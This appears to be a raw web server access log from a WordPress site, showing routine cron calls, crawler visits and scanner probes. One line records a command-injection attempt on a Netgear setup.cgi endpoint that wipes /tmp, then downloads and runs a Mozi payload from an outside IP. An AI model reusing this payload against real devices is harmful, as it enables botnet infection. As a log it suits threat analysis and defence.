89.42.231.239 - - [26/Dec/2025:09:21:36 +0800] "GET /SDK/webLanguage HTTP/1.1" 301 5 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [26/Dec/2025:09:29:26 +0800] "POST /wp-cron.php?doing_wp_cron=1766712566.6141560077667236328125 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
204.76.203.219 - - [26/Dec/2025:09:29:26 +0800] "GET / HTTP/1.1" 200 33677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46"
36.133.115.36 - - [26/Dec/2025:09:47:11 +0800] "POST /wp-cron.php?doing_wp_cron=1766713631.6804380416870117187500 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
101.91.148.219 - - [26/Dec/2025:09:47:11 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
36.133.115.36 - - [26/Dec/2025:09:52:56 +0800] "POST /wp-cron.php?doing_wp_cron=1766713976.5368640422821044921875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
66.240.236.109 - - [26/Dec/2025:09:52:56 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 zgrab/0.x"
36.133.115.36 - - [26/Dec/2025:10:19:41 +0800] "POST /wp-cron.php?doing_wp_cron=1766715581.9401569366455078125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
103.199.205.142 - - [26/Dec/2025:10:19:42 +0800] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://103.199.205.142:37373/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 HTTP/1.0" 404 31351 "-" "-"
36.133.115.36 - - [26/Dec/2025:10:24:02 +0800] "POST /wp-cron.php?doing_wp_cron=1766715842.7936460971832275390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.55.71 - - [26/Dec/2025:10:24:03 +0800] "GET / HTTP/1.1" 200 109837 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:144.0) Gecko/20100101 Firefox/144.0"
198.244.242.155 - - [26/Dec/2025:10:27:26 +0800] "GET /club/ HTTP/1.1" 200 13048 "-" "Mozilla/5.0 (compatible; AhrefsBot/7.0; +http://ahrefs.com/robot/)"
36.133.115.36 - - [26/Dec/2025:10:29:39 +0800] "POST /wp-cron.php?doing_wp_cron=1766716179.1760120391845703125000 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.54.147 - - [26/Dec/2025:10:29:40 +0800] "GET / HTTP/1.1" 200 152290 "-" "Mozilla/5.0"
52.167.144.21 - - [26/Dec/2025:10:37:34 +0800] "GET /wp-content/uploads/2025/08/1755826390-DSC01765.webp HTTP/1.1" 200 71514 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
36.133.115.36 - - [26/Dec/2025:10:49:18 +0800] "POST /wp-cron.php?doing_wp_cron=1766717358.2832090854644775390625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
141.98.11.140 - - [26/Dec/2025:10:49:19 +0800] "GET / HTTP/1.1" 200 152290 "-" "-"
36.133.115.36 - - [26/Dec/2025:10:51:16 +0800] "POST /wp-cron.php?doing_wp_cron=1766717476.4455010890960693359375 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
193.142.147.209 - - [26/Dec/2025:10:51:20 +0800] "POST / HTTP/1.1" 200 33677 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"
36.133.115.36 - - [26/Dec/2025:11:09:24 +0800] "POST /wp-cron.php?doing_wp_cron=1766718564.2650980949401855468750 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
198.235.24.234 - - [26/Dec/2025:11:09:24 +0800] "GET / HTTP/1.0" 301 0 "-" "Hello from Palo Alto Networks, find out more about our scans in https://docs-cortex.paloaltonetworks.com/r/1/Cortex-Xpanse/Scanning-activity"
36.133.115.36 - - [26/Dec/2025:11:10:16 +0800] "POST /wp-cron.php?doing_wp_cron=1766718616.8279330730438232421875 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
95.214.55.71 - - [26/Dec/2025:11:10:16 +0800] "GET /login.asp HTTP/1.1" 301 5 "-" "-"
36.133.115.36 - - [26/Dec/2025:11:13:16 +0800] "POST /wp-cron.php?doing_wp_cron=1766718795.9793379306793212890625 HTTP/1.1" 200 31 "-" "WordPress/6.8.3; http://cqqizhou.com"
170.106.107.87 - - [26/Dec/2025:11:13:16 +0800] "GET / HTTP/1.1" 301 5 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
